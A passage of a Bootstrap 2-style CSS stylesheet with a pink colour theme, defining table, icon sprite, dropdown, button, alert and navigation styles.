1px solid #dddddd; } .table th { font-weight: bold; } .table thead th { vertical-align: bottom; } .table caption + thead tr:first-child th, .table caption + thead tr:first-child td, .table colgroup + thead tr:first-child th, .table colgroup + thead tr:first-child td, .table thead:first-child tr:first-child th, .table thead:first-child tr:first-child td { border-top: 0; } .table tbody + tbody { border-top: 2px solid #dddddd; } .table .table { background-color: #ffffff; } .table-condensed th, .table-condensed td { padding: 4px 5px; } .table-bordered { border: 1px solid #dddddd; border-collapse: separate; *border-collapse: collapse; border-left: 0; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; } .table-bordered th, .table-bordered td { border-left: 1px solid #dddddd; } .table-bordered caption + thead tr:first-child th, .table-bordered caption + tbody tr:first-child th, .table-bordered caption + tbody tr:first-child td, .table-bordered colgroup + thead tr:first-child th, .table-bordered colgroup + tbody tr:first-child th, .table-bordered colgroup + tbody tr:first-child td, .table-bordered thead:first-child tr:first-child th, .table-bordered tbody:first-child tr:first-child th, .table-bordered tbody:first-child tr:first-child td { border-top: 0; } .table-bordered thead:first-child tr:first-child > th:first-child, .table-bordered tbody:first-child tr:first-child > td:first-child, .table-bordered tbody:first-child tr:first-child > th:first-child { -webkit-border-top-left-radius: 4px; -moz-border-radius-topleft: 4px; border-top-left-radius: 4px; } .table-bordered thead:first-child tr:first-child > th:last-child, .table-bordered tbody:first-child tr:first-child > td:last-child, .table-bordered tbody:first-child tr:first-child > th:last-child { -webkit-border-top-right-radius: 4px; -moz-border-radius-topright: 4px; border-top-right-radius: 4px; } .table-bordered thead:last-child tr:last-child > th:first-child, .table-bordered tbody:last-child tr:last-child > td:first-child, .table-bordered tbody:last-child tr:last-child > th:first-child, .table-bordered tfoot:last-child tr:last-child > td:first-child, .table-bordered tfoot:last-child tr:last-child > th:first-child { -webkit-border-bottom-left-radius: 4px; -moz-border-radius-bottomleft: 4px; border-bottom-left-radius: 4px; } .table-bordered thead:last-child tr:last-child > th:last-child, .table-bordered tbody:last-child tr:last-child > td:last-child, .table-bordered tbody:last-child tr:last-child > th:last-child, .table-bordered tfoot:last-child tr:last-child > td:last-child, .table-bordered tfoot:last-child tr:last-child > th:last-child { -webkit-border-bottom-right-radius: 4px; -moz-border-radius-bottomright: 4px; border-bottom-right-radius: 4px; } .table-bordered tfoot + tbody:last-child tr:last-child td:first-child { -webkit-border-bottom-left-radius: 0; -moz-border-radius-bottomleft: 0; border-bottom-left-radius: 0; } .table-bordered tfoot + tbody:last-child tr:last-child td:last-child { -webkit-border-bottom-right-radius: 0; -moz-border-radius-bottomright: 0; border-bottom-right-radius: 0; } .table-bordered caption + thead tr:first-child th:first-child, .table-bordered caption + tbody tr:first-child td:first-child, .table-bordered colgroup + thead tr:first-child th:first-child, .table-bordered colgroup + tbody tr:first-child td:first-child { -webkit-border-top-left-radius: 4px; -moz-border-radius-topleft: 4px; border-top-left-radius: 4px; } .table-bordered caption + thead tr:first-child th:last-child, .table-bordered caption + tbody tr:first-child td:last-child, .table-bordered colgroup + thead tr:first-child th:last-child, .table-bordered colgroup + tbody tr:first-child td:last-child { -webkit-border-top-right-radius: 4px; -moz-border-radius-topright: 4px; border-top-right-radius: 4px; } .table-striped tbody > tr:nth-child(odd) > td, .table-striped tbody > tr:nth-child(odd) > th { background-color: #f9f9f9; } .table-hover tbody tr:hover > td, .table-hover tbody tr:hover > th { background-color: #f5f5f5; } table td[class*="span"], table th[class*="span"], .row-fluid table td[class*="span"], .row-fluid table th[class*="span"] { display: table-cell; float: none; margin-left: 0; } .table td.span1, .table th.span1 { float: none; width: 44px; margin-left: 0; } .table td.span2, .table th.span2 { float: none; width: 124px; margin-left: 0; } .table td.span3, .table th.span3 { float: none; width: 204px; margin-left: 0; } .table td.span4, .table th.span4 { float: none; width: 284px; margin-left: 0; } .table td.span5, .table th.span5 { float: none; width: 364px; margin-left: 0; } .table td.span6, .table th.span6 { float: none; width: 444px; margin-left: 0; } .table td.span7, .table th.span7 { float: none; width: 524px; margin-left: 0; } .table td.span8, .table th.span8 { float: none; width: 604px; margin-left: 0; } .table td.span9, .table th.span9 { float: none; width: 684px; margin-left: 0; } .table td.span10, .table th.span10 { float: none; width: 764px; margin-left: 0; } .table td.span11, .table th.span11 { float: none; width: 844px; margin-left: 0; } .table td.span12, .table th.span12 { float: none; width: 924px; margin-left: 0; } .table tbody tr.success > td { background-color: #dff0d8; } .table tbody tr.error > td { background-color: #f2dede; } .table tbody tr.warning > td { background-color: #fcf8e3; } .table tbody tr.info > td { background-color: #d9edf7; } .table-hover tbody tr.success:hover > td { background-color: #d0e9c6; } .table-hover tbody tr.error:hover > td { background-color: #ebcccc; } .table-hover tbody tr.warning:hover > td { background-color: #faf2cc; } .table-hover tbody tr.info:hover > td { background-color: #c4e3f3; } /********************************************************************************* ********************* Components: common **************************************** **********************************************************************************/ [class^="icon-"], [class*=" icon-"] { display: inline-block; width: 14px; height: 14px; *margin-right: .3em; line-height: 14px; vertical-align: text-top; background-image: url("../img/glyphicons-halflings.png"); background-position: 14px 14px; background-repeat: no-repeat; margin-top: 1px; } /* White icons with optional class, or on hover/focus/active states of certain elements */ .icon-white, .nav-pills > .active > a > [class^="icon-"], .nav-pills > .active > a > [class*=" icon-"], .nav-list > .active > a > [class^="icon-"], .nav-list > .active > a > [class*=" icon-"], .navbar-inverse .nav > .active > a > [class^="icon-"], .navbar-inverse .nav > .active > a > [class*=" icon-"], .dropdown-menu > li > a:hover > [class^="icon-"], .dropdown-menu > li > a:focus > [class^="icon-"], .dropdown-menu > li > a:hover > [class*=" icon-"], .dropdown-menu > li > a:focus > [class*=" icon-"], .dropdown-menu > .active > a > [class^="icon-"], .dropdown-menu > .active > a > [class*=" icon-"], .dropdown-submenu:hover > a > [class^="icon-"], .dropdown-submenu:focus > a > [class^="icon-"], .dropdown-submenu:hover > a > [class*=" icon-"], .dropdown-submenu:focus > a > [class*=" icon-"] { background-image: url("../img/glyphicons-halflings-white.png"); } .icon-glass { background-position: 0 0; } .icon-music { background-position: -24px 0; } .icon-search { background-position: -48px 0; } .icon-envelope { background-position: -72px 0; } .icon-heart { background-position: -96px 0; } .icon-star { background-position: -120px 0; } .icon-star-empty { background-position: -144px 0; } .icon-user { background-position: -168px 0; } .icon-film { background-position: -192px 0; } .icon-th-large { background-position: -216px 0; } .icon-th { background-position: -240px 0; } .icon-th-list { background-position: -264px 0; } .icon-ok { background-position: -288px 0; } .icon-remove { background-position: -312px 0; } .icon-zoom-in { background-position: -336px 0; } .icon-zoom-out { background-position: -360px 0; } .icon-off { background-position: -384px 0; } .icon-signal { background-position: -408px 0; } .icon-cog { background-position: -432px 0; } .icon-trash { background-position: -456px 0; } .icon-home { background-position: 0 -24px; } .icon-file { background-position: -24px -24px; } .icon-time { background-position: -48px -24px; } .icon-road { background-position: -72px -24px; } .icon-download-alt { background-position: -96px -24px; } .icon-download { background-position: -120px -24px; } .icon-upload { background-position: -144px -24px; } .icon-inbox { background-position: -168px -24px; } .icon-play-circle { background-position: -192px -24px; } .icon-repeat { background-position: -216px -24px; } .icon-refresh { background-position: -240px -24px; } .icon-list-alt { background-position: -264px -24px; } .icon-lock { background-position: -287px -24px; } .icon-flag { background-position: -312px -24px; } .icon-headphones { background-position: -336px -24px; } .icon-volume-off { background-position: -360px -24px; } .icon-volume-down { background-position: -384px -24px; } .icon-volume-up { background-position: -408px -24px; } .icon-qrcode { background-position: -432px -24px; } .icon-barcode { background-position: -456px -24px; } .icon-tag { background-position: 0 -48px; } .icon-tags { background-position: -25px -48px; } .icon-book { background-position: -48px -48px; } .icon-bookmark { background-position: -72px -48px; } .icon-print { background-position: -96px -48px; } .icon-camera { background-position: -120px -48px; } .icon-font { background-position: -144px -48px; } .icon-bold { background-position: -167px -48px; } .icon-italic { background-position: -192px -48px; } .icon-text-height { background-position: -216px -48px; } .icon-text-width { background-position: -240px -48px; } .icon-align-left { background-position: -264px -48px; } .icon-align-center { background-position: -288px -48px; } .icon-align-right { background-position: -312px -48px; } .icon-align-justify { background-position: -336px -48px; } .icon-list { background-position: -360px -48px; } .icon-indent-left { background-position: -384px -48px; } .icon-indent-right { background-position: -408px -48px; } .icon-facetime-video { background-position: -432px -48px; } .icon-picture { background-position: -456px -48px; } .icon-pencil { background-position: 0 -72px; } .icon-map-marker { background-position: -24px -72px; } .icon-adjust { background-position: -48px -72px; } .icon-tint { background-position: -72px -72px; } .icon-edit { background-position: -96px -72px; } .icon-share { background-position: -120px -72px; } .icon-check { background-position: -144px -72px; } .icon-move { background-position: -168px -72px; } .icon-step-backward { background-position: -192px -72px; } .icon-fast-backward { background-position: -216px -72px; } .icon-backward { background-position: -240px -72px; } .icon-play { background-position: -264px -72px; } .icon-pause { background-position: -288px -72px; } .icon-stop { background-position: -312px -72px; } .icon-forward { background-position: -336px -72px; } .icon-fast-forward { background-position: -360px -72px; } .icon-step-forward { background-position: -384px -72px; } .icon-eject { background-position: -408px -72px; } .icon-chevron-left { background-position: -432px -72px; } .icon-chevron-right { background-position: -456px -72px; } .icon-plus-sign { background-position: 0 -96px; } .icon-minus-sign { background-position: -24px -96px; } .icon-remove-sign { background-position: -48px -96px; } .icon-ok-sign { background-position: -72px -96px; } .icon-question-sign { background-position: -96px -96px; } .icon-info-sign { background-position: -120px -96px; } .icon-screenshot { background-position: -144px -96px; } .icon-remove-circle { background-position: -168px -96px; } .icon-ok-circle { background-position: -192px -96px; } .icon-ban-circle { background-position: -216px -96px; } .icon-arrow-left { background-position: -240px -96px; } .icon-arrow-right { background-position: -264px -96px; } .icon-arrow-up { background-position: -289px -96px; } .icon-arrow-down { background-position: -312px -96px; } .icon-share-alt { background-position: -336px -96px; } .icon-resize-full { background-position: -360px -96px; } .icon-resize-small { background-position: -384px -96px; } .icon-plus { background-position: -408px -96px; } .icon-minus { background-position: -433px -96px; } .icon-asterisk { background-position: -456px -96px; } .icon-exclamation-sign { background-position: 0 -120px; } .icon-gift { background-position: -24px -120px; } .icon-leaf { background-position: -48px -120px; } .icon-fire { background-position: -72px -120px; } .icon-eye-open { background-position: -96px -120px; } .icon-eye-close { background-position: -120px -120px; } .icon-warning-sign { background-position: -144px -120px; } .icon-plane { background-position: -168px -120px; } .icon-calendar { background-position: -192px -120px; } .icon-random { background-position: -216px -120px; width: 16px; } .icon-comment { background-position: -240px -120px; } .icon-magnet { background-position: -264px -120px; } .icon-chevron-up { background-position: -288px -120px; } .icon-chevron-down { background-position: -313px -119px; } .icon-retweet { background-position: -336px -120px; } .icon-shopping-cart { background-position: -360px -120px; } .icon-folder-close { background-position: -384px -120px; width: 16px; } .icon-folder-open { background-position: -408px -120px; width: 16px; } .icon-resize-vertical { background-position: -432px -119px; } .icon-resize-horizontal { background-position: -456px -118px; } .icon-hdd { background-position: 0 -144px; } .icon-bullhorn { background-position: -24px -144px; } .icon-bell { background-position: -48px -144px; } .icon-certificate { background-position: -72px -144px; } .icon-thumbs-up { background-position: -96px -144px; } .icon-thumbs-down { background-position: -120px -144px; } .icon-hand-right { background-position: -144px -144px; } .icon-hand-left { background-position: -168px -144px; } .icon-hand-up { background-position: -192px -144px; } .icon-hand-down { background-position: -216px -144px; } .icon-circle-arrow-right { background-position: -240px -144px; } .icon-circle-arrow-left { background-position: -264px -144px; } .icon-circle-arrow-up { background-position: -288px -144px; } .icon-circle-arrow-down { background-position: -312px -144px; } .icon-globe { background-position: -336px -144px; } .icon-wrench { background-position: -360px -144px; } .icon-tasks { background-position: -384px -144px; } .icon-filter { background-position: -408px -144px; } .icon-briefcase { background-position: -432px -144px; } .icon-fullscreen { background-position: -456px -144px; } .dropup, .dropdown { position: relative; } .dropdown-toggle { *margin-bottom: -3px; } .dropdown-toggle:active, .open .dropdown-toggle { outline: 0; } .caret { display: inline-block; width: 0; height: 0; vertical-align: top; border-top: 4px solid #000000; border-right: 4px solid transparent; border-left: 4px solid transparent; content: ""; } .dropdown .caret { margin-top: 8px; margin-left: 2px; } .dropdown-menu { position: absolute; top: 100%; left: 0; z-index: 1000; display: none; float: left; min-width: 160px; padding: 5px 0; margin: 2px 0 0; list-style: none; background-color: #ffffff; border: 1px solid #ccc; border: 1px solid rgba(0, 0, 0, 0.2); *border-right-width: 2px; *border-bottom-width: 2px; -webkit-border-radius: 6px; -moz-border-radius: 6px; border-radius: 6px; -webkit-box-shadow: 0 5px 10px rgba(0, 0, 0, 0.2); -moz-box-shadow: 0 5px 10px rgba(0, 0, 0, 0.2); box-shadow: 0 5px 10px rgba(0, 0, 0, 0.2); -webkit-background-clip: padding-box; -moz-background-clip: padding; background-clip: padding-box; } .dropdown-menu.pull-right { right: 0; left: auto; } .dropdown-menu .divider { *width: 100%; height: 1px; margin: 9px 1px; *margin: -5px 0 5px; overflow: hidden; background-color: #e5e5e5; border-bottom: 1px solid #ffffff; } .dropdown-menu > li > a { display: block; padding: 3px 20px; clear: both; font-weight: normal; line-height: 20px; color: #333333; white-space: nowrap; } .dropdown-menu > li > a:hover, .dropdown-menu > li > a:focus, .dropdown-submenu:hover > a, .dropdown-submenu:focus > a { text-decoration: none; color: #ffffff; background-color: #e476b4; background-image: -moz-linear-gradient(top, #e67fb9, #e26aad); background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#e67fb9), to(#e26aad)); background-image: -webkit-linear-gradient(top, #e67fb9, #e26aad); background-image: -o-linear-gradient(top, #e67fb9, #e26aad); background-image: linear-gradient(to bottom, #e67fb9, #e26aad); background-repeat: repeat-x; filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffe67fb9' , endColorstr='#ffe26aad' , GradientType=0); } .dropdown-menu > .active > a, .dropdown-menu > .active > a:hover, .dropdown-menu > .active > a:focus { color: #ffffff; text-decoration: none; outline: 0; background-color: #e476b4; background-image: -moz-linear-gradient(top, #e67fb9, #e26aad); background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#e67fb9), to(#e26aad)); background-image: -webkit-linear-gradient(top, #e67fb9, #e26aad); background-image: -o-linear-gradient(top, #e67fb9, #e26aad); background-image: linear-gradient(to bottom, #e67fb9, #e26aad); background-repeat: repeat-x; filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffe67fb9' , endColorstr='#ffe26aad' , GradientType=0); } .dropdown-menu > .disabled > a, .dropdown-menu > .disabled > a:hover, .dropdown-menu > .disabled > a:focus { color: #999999; } .dropdown-menu > .disabled > a:hover, .dropdown-menu > .disabled > a:focus { text-decoration: none; background-color: transparent; background-image: none; filter: progid:DXImageTransform.Microsoft.gradient(enabled = false); cursor: default; } .open { *z-index: 1000; } .open > .dropdown-menu { display: block; } .pull-right > .dropdown-menu { right: 0; left: auto; } .dropup .caret, .navbar-fixed-bottom .dropdown .caret { border-top: 0; border-bottom: 4px solid #000000; content: ""; } .dropup .dropdown-menu, .navbar-fixed-bottom .dropdown .dropdown-menu { top: auto; bottom: 100%; margin-bottom: 1px; } .dropdown-submenu { position: relative; } .dropdown-submenu > .dropdown-menu { top: 0; left: 100%; margin-top: -6px; margin-left: -1px; -webkit-border-radius: 0 6px 6px 6px; -moz-border-radius: 0 6px 6px 6px; border-radius: 0 6px 6px 6px; } .dropdown-submenu:hover > .dropdown-menu { display: block; } .dropup .dropdown-submenu > .dropdown-menu { top: auto; bottom: 0; margin-top: 0; margin-bottom: -2px; -webkit-border-radius: 5px 5px 5px 0; -moz-border-radius: 5px 5px 5px 0; border-radius: 5px 5px 5px 0; } .dropdown-submenu > a:after { display: block; content: " "; float: right; width: 0; height: 0; border-color: transparent; border-style: solid; border-width: 5px 0 5px 5px; border-left-color: #cccccc; margin-top: 5px; margin-right: -10px; } .dropdown-submenu:hover > a:after { border-left-color: #ffffff; } .dropdown-submenu.pull-left { float: none; } .dropdown-submenu.pull-left > .dropdown-menu { left: -100%; margin-left: 10px; -webkit-border-radius: 6px 0 6px 6px; -moz-border-radius: 6px 0 6px 6px; border-radius: 6px 0 6px 6px; } .dropdown .dropdown-menu .nav-header { padding-left: 20px; padding-right: 20px; } .typeahead { z-index: 1051; margin-top: 2px; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; } .well { min-height: 20px; padding: 19px; margin-bottom: 20px; background-color: #f5f5f5; border: 1px solid #e3e3e3; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.05); -moz-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.05); box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.05); } .well blockquote { border-color: #ddd; border-color: rgba(0, 0, 0, 0.15); } .well-large { padding: 24px; -webkit-border-radius: 6px; -moz-border-radius: 6px; border-radius: 6px; } .well-small { padding: 9px; -webkit-border-radius: 3px; -moz-border-radius: 3px; border-radius: 3px; } .fade { opacity: 0; -webkit-transition: opacity 0.15s linear; -moz-transition: opacity 0.15s linear; -o-transition: opacity 0.15s linear; transition: opacity 0.15s linear; } .fade.in { opacity: 1; } .collapse { position: relative; height: 0; overflow: hidden; -webkit-transition: height 0.35s ease; -moz-transition: height 0.35s ease; -o-transition: height 0.35s ease; transition: height 0.35s ease; } .collapse.in { height: auto; } .close { float: right; font-size: 20px; font-weight: bold; line-height: 20px; color: #000000; text-shadow: 0 1px 0 #ffffff; opacity: 0.2; filter: alpha(opacity=20); } .close:hover, .close:focus { color: #000000; text-decoration: none; cursor: pointer; opacity: 0.4; filter: alpha(opacity=40); } button.close { padding: 0; cursor: pointer; background: transparent; border: 0; -webkit-appearance: none; } /********************************************************************************* ***************** Components: Buttons & Alerts *********************************** **********************************************************************************/ .btn { display: inline-block; *display: inline; /* IE7 inline-block hack */ *zoom: 1; padding: 4px 12px; margin-bottom: 0; font-size: 14px; line-height: 20px; text-align: center; vertical-align: middle; cursor: pointer; color: #333333; text-shadow: 0 1px 1px rgba(255, 255, 255, 0.75); background-color: #f5f5f5; background-image: -moz-linear-gradient(top, #ffffff, #e6e6e6); background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#ffffff), to(#e6e6e6)); background-image: -webkit-linear-gradient(top, #ffffff, #e6e6e6); background-image: -o-linear-gradient(top, #ffffff, #e6e6e6); background-image: linear-gradient(to bottom, #ffffff, #e6e6e6); background-repeat: repeat-x; filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffffffff' , endColorstr='#ffe6e6e6' , GradientType=0); border-color: #e6e6e6 #e6e6e6 #bfbfbf; border-color: rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.25); *background-color: #e6e6e6; /* Darken IE7 buttons by default so they stand out more given they won't have borders */ filter: progid:DXImageTransform.Microsoft.gradient(enabled = false); border: 1px solid #cccccc; *border: 0; border-bottom-color: #b3b3b3; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; *margin-left: .3em; -webkit-box-shadow: inset 0 1px 0 rgba(255,255,255,.2), 0 1px 2px rgba(0,0,0,.05); -moz-box-shadow: inset 0 1px 0 rgba(255,255,255,.2), 0 1px 2px rgba(0,0,0,.05); box-shadow: inset 0 1px 0 rgba(255,255,255,.2), 0 1px 2px rgba(0,0,0,.05); } .btn:hover, .btn:focus, .btn:active, .btn.active, .btn.disabled, .btn[disabled] { color: #333333; background-color: #e6e6e6; *background-color: #d9d9d9; } .btn:active, .btn.active { background-color: #cccccc \9; } .btn:first-child { *margin-left: 0; } .btn:hover, .btn:focus { color: #333333; text-decoration: none; background-position: 0 -15px; -webkit-transition: background-position 0.1s linear; -moz-transition: background-position 0.1s linear; -o-transition: background-position 0.1s linear; transition: background-position 0.1s linear; } .btn:focus { outline: thin dotted #333; outline: 5px auto #f3bfdc; outline-offset: -2px; } .btn.active, .btn:active { background-image: none; outline: 0; -webkit-box-shadow: inset 0 2px 4px rgba(0,0,0,.15), 0 1px 2px rgba(0,0,0,.05); -moz-box-shadow: inset 0 2px 4px rgba(0,0,0,.15), 0 1px 2px rgba(0,0,0,.05); box-shadow: inset 0 2px 4px rgba(0,0,0,.15), 0 1px 2px rgba(0,0,0,.05); } .btn.disabled, .btn[disabled] { cursor: default; background-image: none; opacity: 0.65; filter: alpha(opacity=65); -webkit-box-shadow: none; -moz-box-shadow: none; box-shadow: none; } .btn-large { padding: 11px 19px; font-size: 17.5px; -webkit-border-radius: 6px; -moz-border-radius: 6px; border-radius: 6px; } .btn-large [class^="icon-"], .btn-large [class*=" icon-"] { margin-top: 4px; } .btn-small { padding: 2px 10px; font-size: 11.9px; -webkit-border-radius: 3px; -moz-border-radius: 3px; border-radius: 3px; } .btn-small [class^="icon-"], .btn-small [class*=" icon-"] { margin-top: 0; } .btn-mini [class^="icon-"], .btn-mini [class*=" icon-"] { margin-top: -1px; } .btn-mini { padding: 0 6px; font-size: 10.5px; -webkit-border-radius: 3px; -moz-border-radius: 3px; border-radius: 3px; } .btn-block { display: block; width: 100%; padding-left: 0; padding-right: 0; -webkit-box-sizing: border-box; -moz-box-sizing: border-box; box-sizing: border-box; } .btn-block + .btn-block { margin-top: 5px; } input[type="submit"].btn-block, input[type="reset"].btn-block, input[type="button"].btn-block { width: 100%; } .btn-primary.active, .btn-warning.active, .btn-danger.active, .btn-success.active, .btn-info.active, .btn-inverse.active { color: rgba(255, 255, 255, 0.75); } .btn-primary { color: #ffffff; text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.25); background-color: #e165ab; background-image: -moz-linear-gradient(top, #e67fb9, #da3f96); background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#e67fb9), to(#da3f96)); background-image: -webkit-linear-gradient(top, #e67fb9, #da3f96); background-image: -o-linear-gradient(top, #e67fb9, #da3f96); background-image: linear-gradient(to bottom, #e67fb9, #da3f96); background-repeat: repeat-x; filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffe67fb9' , endColorstr='#ffda3f96' , GradientType=0); border-color: #da3f96 #da3f96 #ab216f; border-color: rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.25); *background-color: #da3f96; /* Darken IE7 buttons by default so they stand out more given they won't have borders */ filter: progid:DXImageTransform.Microsoft.gradient(enabled = false); } .btn-primary:hover, .btn-primary:focus, .btn-primary:active, .btn-primary.active, .btn-primary.disabled, .btn-primary[disabled] { color: #ffffff; background-color: #da3f96; *background-color: #d52a8a; } .btn-primary:active, .btn-primary.active { background-color: #c0257c \9; } .btn-warning { color: #ffffff; text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.25); background-color: #faa732; background-image: -moz-linear-gradient(top, #fbb450, #f89406); background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#fbb450), to(#f89406)); background-image: -webkit-linear-gradient(top, #fbb450, #f89406); background-image: -o-linear-gradient(top, #fbb450, #f89406); background-image: linear-gradient(to bottom, #fbb450, #f89406); background-repeat: repeat-x; filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#fffbb450' , endColorstr='#fff89406' , GradientType=0); border-color: #f89406 #f89406 #ad6704; border-color: rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.25); *background-color: #f89406; /* Darken IE7 buttons by default so they stand out more given they won't have borders */ filter: progid:DXImageTransform.Microsoft.gradient(enabled = false); } .btn-warning:hover, .btn-warning:focus, .btn-warning:active, .btn-warning.active, .btn-warning.disabled, .btn-warning[disabled] { color: #ffffff; background-color: #f89406; *background-color: #df8505; } .btn-warning:active, .btn-warning.active { background-color: #c67605 \9; } .btn-danger { color: #ffffff; text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.25); background-color: #da4f49; background-image: -moz-linear-gradient(top, #ee5f5b, #bd362f); background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#ee5f5b), to(#bd362f)); background-image: -webkit-linear-gradient(top, #ee5f5b, #bd362f); background-image: -o-linear-gradient(top, #ee5f5b, #bd362f); background-image: linear-gradient(to bottom, #ee5f5b, #bd362f); background-repeat: repeat-x; filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffee5f5b' , endColorstr='#ffbd362f' , GradientType=0); border-color: #bd362f #bd362f #802420; border-color: rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.25); *background-color: #bd362f; /* Darken IE7 buttons by default so they stand out more given they won't have borders */ filter: progid:DXImageTransform.Microsoft.gradient(enabled = false); } .btn-danger:hover, .btn-danger:focus, .btn-danger:active, .btn-danger.active, .btn-danger.disabled, .btn-danger[disabled] { color: #ffffff; background-color: #bd362f; *background-color: #a9302a; } .btn-danger:active, .btn-danger.active { background-color: #942a25 \9; } .btn-success { color: #ffffff; text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.25); background-color: #5bb75b; background-image: -moz-linear-gradient(top, #62c462, #51a351); background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#62c462), to(#51a351)); background-image: -webkit-linear-gradient(top, #62c462, #51a351); background-image: -o-linear-gradient(top, #62c462, #51a351); background-image: linear-gradient(to bottom, #62c462, #51a351); background-repeat: repeat-x; filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff62c462' , endColorstr='#ff51a351' , GradientType=0); border-color: #51a351 #51a351 #387038; border-color: rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.25); *background-color: #51a351; /* Darken IE7 buttons by default so they stand out more given they won't have borders */ filter: progid:DXImageTransform.Microsoft.gradient(enabled = false); } .btn-success:hover, .btn-success:focus, .btn-success:active, .btn-success.active, .btn-success.disabled, .btn-success[disabled] { color: #ffffff; background-color: #51a351; *background-color: #499249; } .btn-success:active, .btn-success.active { background-color: #408140 \9; } .btn-info { color: #ffffff; text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.25); background-color: #f2bbda; background-image: -moz-linear-gradient(top, #f7d4e8, #ea94c5); background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#f7d4e8), to(#ea94c5)); background-image: -webkit-linear-gradient(top, #f7d4e8, #ea94c5); background-image: -o-linear-gradient(top, #f7d4e8, #ea94c5); background-image: linear-gradient(to bottom, #f7d4e8, #ea94c5); background-repeat: repeat-x; filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#fff7d4e8' , endColorstr='#ffea94c5' , GradientType=0); border-color: #ea94c5 #ea94c5 #de54a2; border-color: rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.25); *background-color: #ea94c5; /* Darken IE7 buttons by default so they stand out more given they won't have borders */ filter: progid:DXImageTransform.Microsoft.gradient(enabled = false); } .btn-info:hover, .btn-info:focus, .btn-info:active, .btn-info.active, .btn-info.disabled, .btn-info[disabled] { color: #ffffff; background-color: #ea94c5; *background-color: #e67fb9; } .btn-info:active, .btn-info.active { background-color: #e26aad \9; } .btn-inverse { color: #ffffff; text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.25); background-color: #363636; background-image: -moz-linear-gradient(top, #444444, #222222); background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#444444), to(#222222)); background-image: -webkit-linear-gradient(top, #444444, #222222); background-image: -o-linear-gradient(top, #444444, #222222); background-image: linear-gradient(to bottom, #444444, #222222); background-repeat: repeat-x; filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff444444' , endColorstr='#ff222222' , GradientType=0); border-color: #222222 #222222 #000000; border-color: rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.25); *background-color: #222222; /* Darken IE7 buttons by default so they stand out more given they won't have borders */ filter: progid:DXImageTransform.Microsoft.gradient(enabled = false); } .btn-inverse:hover, .btn-inverse:focus, .btn-inverse:active, .btn-inverse.active, .btn-inverse.disabled, .btn-inverse[disabled] { color: #ffffff; background-color: #222222; *background-color: #151515; } .btn-inverse:active, .btn-inverse.active { background-color: #080808 \9; } button.btn, input[type="submit"].btn { *padding-top: 3px; *padding-bottom: 3px; } button.btn::-moz-focus-inner, input[type="submit"].btn::-moz-focus-inner { padding: 0; border: 0; } button.btn.btn-large, input[type="submit"].btn.btn-large { *padding-top: 7px; *padding-bottom: 7px; } button.btn.btn-small, input[type="submit"].btn.btn-small { *padding-top: 3px; *padding-bottom: 3px; } button.btn.btn-mini, input[type="submit"].btn.btn-mini { *padding-top: 1px; *padding-bottom: 1px; } .btn-link, .btn-link:active, .btn-link[disabled] { background-color: transparent; background-image: none; -webkit-box-shadow: none; -moz-box-shadow: none; box-shadow: none; } .btn-link { border-color: transparent; cursor: pointer; color: #e67fb9; -webkit-border-radius: 0; -moz-border-radius: 0; border-radius: 0; } .btn-link:hover, .btn-link:focus { color: #da3f96; text-decoration: underline; background-color: transparent; } .btn-link[disabled]:hover, .btn-link[disabled]:focus { color: #333333; text-decoration: none; } .alert { padding: 8px 35px 8px 14px; margin-bottom: 20px; text-shadow: 0 1px 0 rgba(255, 255, 255, 0.5); background-color: #fcf8e3; border: 1px solid #fbeed5; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; } .alert, .alert h4 { color: #c09853; } .alert h4 { margin: 0; } .alert .close { position: relative; top: -2px; right: -21px; line-height: 20px; } .alert-success { background-color: #dff0d8; border-color: #d6e9c6; color: #468847; } .alert-success h4 { color: #468847; } .alert-danger, .alert-error { background-color: #f2dede; border-color: #eed3d7; color: #b94a48; } .alert-danger h4, .alert-error h4 { color: #b94a48; } .alert-info { background-color: #d9edf7; border-color: #bce8f1; color: #3a87ad; } .alert-info h4 { color: #3a87ad; } .alert-block { padding-top: 14px; padding-bottom: 14px; } .alert-block > p, .alert-block > ul { margin-bottom: 0; } .alert-block p + p { margin-top: 5px; } /********************************************************************************* ************************** Components: Nav ************************************** **********************************************************************************/ .nav { margin-left: 0; margin-bottom: 20px; list-style: none; } .nav > li > a { display: block; } .nav > li > a:hover, 